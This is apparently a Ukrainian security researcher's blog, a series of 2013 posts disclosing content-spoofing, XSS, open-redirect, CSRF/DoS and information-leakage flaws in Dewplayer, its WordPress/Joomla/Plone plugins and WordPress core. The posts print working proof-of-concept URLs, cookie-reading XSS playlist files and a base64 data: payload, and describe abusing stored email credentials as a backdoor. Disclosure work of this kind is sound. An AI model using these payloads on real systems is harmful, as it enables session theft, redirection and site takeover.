Websecurity - Веб безпека

У лютому, 02.02.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в плагінах для WordPress, Joomla і Plone, що містять Dewplayer. Раніше я писав про уразливості в Dewplayer.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку Dewplayer через Гугл дорки виводиться 422000 сайтів (і це лише для флешки dewplayer.swf, а ще інші імена файлів цього плеєра).

Цей флеш медіа плеєр в наступних плагінах: Dewplayer WordPress plugin, JosDewplayer і mosdewplayer для Joomla та collective.dewplayer для Plone. Також можуть бути інші плагіни з Dewplayer.

Наявність конкретної CS та XSS уразливості залежить від версії плеєра, що постачається з конкретним плагіном. При цьому адмін сайта може встановити більш нову версію флешки ніж та, що постачається з плагіном.

Dewplayer для WordPress:

З плагіном постачаються наступні флешки: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. Вони всі мають CS дірки.

Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php

JosDewplayer і mosdewplayer:

Плагін JosDewplayer базується на mosdewplayer, тому дірки в них мають збігатися.

З плагіном постачаються наступні флешки: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. Вони всі мають CS дірки.

http://site/plugins/content/josdewplayer/dewplayer.swf

collective.dewplayer:

З плагіном постачаються наступні флешки: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. Всі ці флешки мають CS, а dewplayer-vinyl.swf ще і XSS дірки.

Шлях на сайті може бути різним:

http://site/files/++resource++collective.dewplayer/dewplayer.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/dewplayer.swf?mp3=1.mp3

XSS (WASC-08):

http://site/path/dewplayer-vinyl.swf?xml=xss.xml

Вразливі наступні веб додатки: Dewplayer WordPress plugin 1.2 і попередні версії, JosDewplayer 2.0 і попередні версії, всі версії mosdewplayer, collective.dewplayer 1.2 і попередні версії.

Вразливі веб додатки, що використовують Dewplayer 2.2.2 і попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Videowall, dhtmlxSpreadsheet та WPLocalPlaces. Для котрих з’явилися експлоіти. Videowall - це плагін для розміщення списку відео, dhtmlxSpreadsheet - це плагін для розміщення таблиць, WPLocalPlaces - це плагін.

• WordPress Videowall Cross Site Scripting (деталі)
• WordPress dhtmlxspreadsheet Cross Site Scripting (деталі)
• WordPress WPLocalPlaces Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Service Manager, Remote Disclosure of Information, Cross Site Scripting (XSS) (деталі)
• Zenphoto 1.4.5.2 multiple vulnerabilities (деталі)
• SQL injection vulnerability in Zabbix (деталі)
• Vanilla Forums <= 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability (деталі)
• IcedTea-Web vulnerabilities (деталі)

25.10.2013

У лютому, 02.02.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в Dewplayer. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

19.12.2013

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?mp3=1.mp3
http://site/dewplayer.swf?file=1.mp3
http://site/dewplayer.swf?sound=1.mp3
http://site/dewplayer.swf?son=1.mp3

Це для старих версій плеєра. У версіях Dewplayer 2.x з цих 4 варіантів є тільки mp3.

Content Spoofing (Content Injection) (WASC-12):

http://site/dewplayer.swf?xml=1.xml

1.xml

<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image/>
<info/>
<link/>
</track>
</trackList>
</playlist>

2.xml (з зображенням)

<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image>http://site/1.jpg</image>
<info/>
<link/>
</track>
</trackList>
</playlist>

XSS (WASC-08):

http://site/dewplayer-vinyl.swf?xml=xss.xml
http://site/dewplayer-vinyl-en.swf?xml=xss.xml

xss.xml

<playlist version="1">
<trackList>
<track>
<location>javascript:alert(document.cookie)</location>
<title>XSS</title>
</track>
</trackList>
</playlist>

http://site/dewplayer-vinyl.swf?xml=xss2.xml
http://site/dewplayer-vinyl-en.swf?xml=xss2.xml

xss2.xml

<playlist version="1">
<trackList>
<track>
<location>1.mp3</location>
<title>XSS</title>
<link>javascript:alert(document.cookie)</link>
</track>
</trackList>
</playlist>

Уразливі Dewplayer 2.2.2 та попередні версії.

В даній добірці уразливості в веб додатках:

• SQL injection vulnerability in Cisco Network Admission Control (NAC) Manager (деталі)
• SilverStripe Framework CMS 3.0.5 - Multiple Web Vulnerabilities (деталі)
• elproLOG MONITOR WebAccess 2.1 - Multiple Web Vulnerabilities (деталі)
• WebAssist PowerCMS PHP - Multiple Web Vulnerabilities (деталі)
• Multiple Vulnerabilities in D-Link DIR-635 (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Image Resizer, WP Realty та WooCommerce. Для котрих з’явилися експлоіти. Image Resizer - це плагін для масштабування зображень, WP Realty - це плагін, WooCommerce - це е-комерс плагін для додання кошика покупця.

• WordPress Image Resizer Cross Site Scripting (деталі)
• WordPress WP Realty Blind SQL Injection (деталі)
• WordPress WooCommerce 2.0.17 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжую проект День багів в WordPress 3. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Зараз я оприлюдню URL Redirector Abuse та Cross-Site Scripting уразливості в WordPress.

Які я знайшов 26.04.2012, одразу як оприлюднив попередні Redirector та XSS уразливості в WP. Тоді я знайшов багато подібних уразливостей - це лише декілька Redirector та XSS дірок в WP.

Redirector (URL Redirector Abuse) (WASC-38):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php

XSS (WASC-08):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=data:text/html;edit-tags.php;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі WordPress 3.6 та попередні версії.

Redirector (URL Redirector Abuse) (WASC-38):

Можливий лише Redirector, але не XSS (в зв’язку з фільтрацією важливих символів). Для атаки потрібно знати значення _wpnonce.

http://site/wp-admin/edit-tags.php?action=add-tag&_wpnonce=096ea8dbbd&_wp_original_http_referer=http://websecurity.com.ua/?edit-tags.php

Уразливі WordPress 3.0 - 3.6.

http://site/wp-admin/edit-tags.php?action=bulk-delete&_wpnonce=ebee6d0330&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php
http://site/wp-admin/media.php?action=editattachment&_wpnonce=2fa131c992&_wp_original_http_referer=http://websecurity.com.ua/?upload.php

Уразливі WordPress 3.6 та попередні версії.

Продовжую проект День багів в WordPress 3. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Зараз я оприлюдню Cross-Site Request Forgery, Denial of Service та Information Leakage уразливості в WordPress, які я знайшов 06.08.2007 (IL) і 31.03.2012 (CSRF і DoS).

Cross-Site Request Forgery (WASC-09) / Denial of Service (WASC-10):

В функціоналі retrospam немає захисту від CSRF.

http://site/wp-admin/options-discussion.php?action=retrospam

Запит запускає перевірку коментарів по стоп-словам, що створює навантаження на сервер. Чим більше слів у списку (а через XSS уразливість їх туди можна додати будь-яку кількість) і чим більше коментарів на сайті, тим більше навантаження.

Cross-Site Request Forgery (WASC-09):

http://site/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1

Запит переносить коментарі, включаючи відмодеровані, до списку модерації. Потрібно лише вказати id коментарів.

Уразливі WordPress 2.0.11 та попередні версії (де був даний функціонал).

Information Leakage (WASC-13):

При звернені до скрипта options.php можна отримати всі важливі дані з БД. Як при доступі в адмінку, так і можна отримати зміст сторінки через XSS атаку. Зокрема різні ключі, солі, логіни і паролі, такі як auth_key, auth_salt, logged_in_key, logged_in_salt, nonce_key, nonce_salt, mailserver_login, mailserver_pass (кількість параметрів залежить від версії WP). Про витік логіну і паролю до електронної пошти в іншому розділі адмінки я вже писав раніше (це друга сторінка, де має місце витік цих даних).

http://site/wp-admin/options.php

Уразливі WordPress 3.7.1 та попередні версії (та в WP 3.8, що вийшов у грудні).

Сьогодні, в День багів в WordPress 3, я оприлюдню багато цікавих уразливостей в WP. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Першими я оприлюдню Information Leakage та Backdoor уразливості в WordPress, що відомі мені ще з червня 2006, коли тільки почав користуватися WP. І які все ще актуальні для всіх версій движка.

Information Leakage (WASC-13):

В БД зберігаються логін і пароль від емайла у відкритій формі в Writing Settings (http://site/wp-admin/options-writing.php), якщо використовується цей функціонал. Тому отримавши дані з БД через SQL Injection чи Information Leakage уразливість, чи отримавши зміст цієї сторінки через XSS, чи отримавши доступ в адмінку через будь-яку уразливість, можна отримати логін і пароль від емайла.

Що дозволить захопити доступ як до цього сайта (через функцію зміни пароля), коли знову знадобиться отримати доступ до сайта, так і до інших сайтів, де є функція відновлення/зміни пароля, що надішлють листи на цей емайл. Бо користувач може використати свій основний емайл (що мені доводилося зустрічати в Інтернеті).

Backdoor:

Цей функціонал також може використовуватися як бекдор. Коли в опціях Writing Settings задається емайл зловмисника, звідки будуть розміщуватися повідомлення на сайт. З XSS кодом, з black SEO лінками, з кодом malware, тощо.

Уразливі WordPress 3.7.1 та попередні версії (та в WP 3.8, що вийшов у грудні).

Окрім виправлення декількох уразливостей у версії WordPress 3.6.1, про які згадали у анонсі, розробники ще виправили три уразливості. Але про них розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок).

В цьому місяці я дослідив зміни в версії 3.6.1 движка і виявив три Full path disclosure уразливості. Про які не згадали ні в описі релізу WP 3.6.1, ні в Codex (при тому, що вони іноді згадують про FPD). Що типово для розробників WP - ще з 2007 року вони часто приховують виправлені уразливості.

Раніше я вже писав про FPD уразливості в WordPress.

Full path disclosure (WASC-13):

В функції get_allowed_mime_types().
В функції set_url_scheme().
В функції comment_form().

Уразливі WordPress 3.6 та попередні версії.